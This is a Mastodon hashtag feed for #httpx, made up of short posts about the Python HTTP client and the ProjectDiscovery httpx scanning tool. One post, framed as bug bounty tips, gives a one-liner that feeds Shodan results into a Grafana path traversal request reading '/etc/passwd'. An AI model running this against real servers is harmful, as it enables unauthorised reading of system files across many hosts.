Mr.Trunk · @mrtrunk
4 followers · 6950 posts · Server dromedary.seedoubleyou.me

SecurityOnline: httpx v1.3.4 releases: fast and multi-purpose HTTP toolkit securityonline.info/httpx-fast

#webinformationgathering #httpx

Last updated 1 year ago

Steve Lord · @stevelord
844 followers · 158 posts · Server bladerunner.social

This time I used for session handling as I wanted to give it a go, and to extract the relevant image tags. I then used httpx to download the files to a "newest" directory.

#httpx #selectolax

Last updated 1 year ago

Elliot Garbus · @ElliotG
19 followers · 110 posts · Server az.social

@mkennedy @pythonbytes
I just recently used Tenacity in an async app with Trio and httpx. I used to retry poorly performing servers. It's fantastic!

#tenacity #python #Trio #httpx

Last updated 2 years ago

Elliot Garbus · @ElliotG
14 followers · 80 posts · Server az.social

Repost... messed up my hashtags.
Doing some coding pulling data from a web site. The server was rather finicky and returning errors occasionally. The tenacity library is a great tool for managing retries!

#python #tenacity #httpx #Trio

Last updated 2 years ago

Tyler B · @tylerb
82 followers · 311 posts · Server hachyderm.io

@jvanderaa I do love what brings to the table but I find myself not using it much these days because I'm enjoying async via & more and more. Combined with or (outside the event loop) for the inventory, it's fairly easy to get things done in a modular way. Nornir is still in the toolbox - and I always recommend it to people newer to automation/Python.

#nornir #Scrapli #httpx #pynetbox #pynautobot #neteng

Last updated 2 years ago

Roberto Prevato · @robertoprevato
31 followers · 44 posts · Server masto.ai

I am surprised that using the built-in `urllib,request.urlopen` in a executor to make async web requests seems to perform consistently faster than the `AsyncClient` implementation in httpx. The first solution, that looks hackish, can be seen here: github.com/Neoteroi/BlackSheep (results of %timeit in the picture below).

#asyncio #python #httpx

Last updated 2 years ago

Michał Górny · @mgorny
43 followers · 29 posts · Server fosstodon.org

packaging fun: requires httpx and python-multipart, requires multipart (and both are part of the same organization on GitHub). python-multipart and multipart are two packages colliding over multipart module/package, so they cannot be installed simultaneously.

github.com/encode/starlette/di

#gentoo #python #starlette #httpx

Last updated 2 years ago

magikh0e :unverified: · @magikh0e
130 followers · 132 posts · Server infosec.exchange

Bounty hunting for vulnerable instances on Shodan

shodan search org:[TARGET] | awk '{print $1}' | httpx -path "/public/plugins/graph/../../../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:x'

github.com/projectdiscovery/ht

#grafana #bugbounty #bugbountytips #exploitation #shodan #httpx

Last updated 2 years ago

magikh0e :unverified: · @magikh0e
130 followers · 132 posts · Server infosec.exchange
John S. · @sneeu
14 followers · 8 posts · Server mastodon.social

I’ve been mucking about with some legacy auth flows at DAY_JOB using and and one of the most useful things I’ve done is to log requests in a Table including the Method, Status, URL, Calling location, Headers, Body, and Response body.

Highly recommended.

#python #httpx #rich

Last updated 2 years ago

Bite Code · @bitecode
119 followers · 4936 posts · Server framapiaf.org

RT @florimondmanca@twitter.com

Just released v0.1 of `aiometer`: a concurrency schedling library for , compatible w/ asyncio + trio.

Usesful for client-side rate limiting and other patterns…

👉 github.com/florimondmanca/aiom

Example below: throttled concurrent web requests with 🦋✨

🐦🔗: twitter.com/florimondmanca/sta

#httpx #backpressure #python

Last updated 5 years ago

Fabian N. T. 🦆 · @fabian
204 followers · 911 posts · Server floss.social

🔖 HTTPX is a fully featured HTTP client for 3, which provides sync and async APIs, and support for both HTTP/1.1 and HTTP/2 — and breaks with some of (minor) quirks (python-httpx.org/compatibility)

python-httpx.org/

#webdev #httpx #requests #Python

Last updated 5 years ago